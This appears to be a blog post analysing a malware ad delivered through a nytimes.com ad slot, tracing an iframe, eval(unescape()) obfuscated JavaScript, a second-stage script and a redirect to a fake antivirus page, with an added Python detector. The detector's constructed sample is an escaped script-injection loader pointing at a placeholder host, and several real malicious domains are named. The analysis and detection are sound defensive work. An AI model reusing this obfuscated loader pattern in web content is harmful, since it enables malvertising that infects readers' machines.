Anatomy of a Malware Ad on NYTimes.com
On Saturday evening, Avast displayed a malware warning as I loaded a nytimes.com article. After some digging, here’s the malware I found.
Ad Delivery
nytimes.com article pages include an ad placement with the HTML DOM ID adxBigAd. From loading a few articles, it seems to rotate between a banner and an iframe.
On this article, a 300×250 iframe was inlining this URL: tradenton.com slash ?id=21610438
(note: I don’t recommend visiting it, and URLs are not linked where possible)
A comment gave the campaign ID asVonage01_1163613_nyt12, though it was obviously unrelated to Vonage. tradenton.com was registered Sept. 2, 2009, so it may have had a previous owner.
Injection
tradenton.com serves a 15-line HTML snippet containing this JavaScript:
As anyone who has looked at phishing links knows, this is nasty on a couple levels. It’s eval()’ing escaped code, which is almost never needed to serve an ad. Note that the variable action_URL is defined but never used. After unescaping the code, this is what’s being run:
What’s served by harlingens.com slash includes02.js? Aha! The eval’ed JavaScript is requesting a second JavaScript file, which hits action_URL:
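The eval(unescape(...)) wrapper described above is the kind of pattern an ad-quality or web-security team can flag automatically. The following is an added example, not code from this post or from any of the sites named in it: it unwraps eval(unescape(...)) layers in a creative, emulating JavaScript’s legacy escape()/unescape(), and lists every URL that only appears after decoding. The snippet it analyses is constructed here, and all domains are placeholders.

```python
import re

# eval(unescape("...")) with either quote style; DOTALL so multi-line strings match
EVAL_RE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.S)
URL_RE = re.compile(r'https?://[^\s"\'<>()]+')
ESC_RE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')


def js_unescape(s):
    """Emulate legacy JavaScript unescape(): decode %XX and %uXXXX sequences."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s):
    """Emulate legacy JavaScript escape(); used only to build the constructed sample."""
    out = []
    for ch in s:
        if ch.isascii() and (ch.isalnum() or ch in "@*_+-./"):
            out.append(ch)              # escape() leaves these characters alone
        elif ord(ch) < 256:
            out.append("%%%02X" % ord(ch))
        else:
            out.append("%%u%04X" % ord(ch))
    return "".join(out)


def analyze(snippet, max_rounds=5):
    """Peel eval(unescape(...)) layers and collect URLs visible before and after decoding."""
    layers, current = [], snippet
    urls = set(URL_RE.findall(snippet))
    for _ in range(max_rounds):          # bounded: nested layers could otherwise loop forever
        m = EVAL_RE.search(current)
        if not m:
            break
        current = js_unescape(m.group(2))
        layers.append(current)
        urls.update(URL_RE.findall(current))
    return {"eval_layers": len(layers), "decoded": layers,
            "urls": sorted(urls), "suspicious": bool(layers)}


# Constructed sample in the shape the post describes: an unused action_URL variable
# plus an eval() over an escaped document.write that pulls a second-stage script.
HIDDEN = ("document.write('<script src=\"http://stage2.example.invalid/includes02.js\">"
          "</script>')")
SAMPLE = ('var action_URL = "http://redirect.example.invalid/act?id=1";\n'
          'eval(unescape("' + js_escape(HIDDEN) + '"))')

if __name__ == "__main__":
    for k, v in analyze(SAMPLE).items():
        print(k, v)
```

Only scheme-bearing URLs in the decoded text are reported; a creative that hides its scheme in a string concatenation would need a further decoding pass.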
Malware
Now we’re talking. Requesting that action_URL on sex-and-the-city.cn actually serves an HTTP 302 Redirect to protection-check07.com slash 1/?sess=%3DGQx3jzwMi02MyZpcD0yMDguNzUuNTcuMTIxJnRpbWU9MTI1NjgwMI0MaQ%3DN. And we hit pay dirt. It’s a fake page for a non-existent antivirus app, which is actually malware. Titled “My computer Online Scan”, this page displays this JS alert: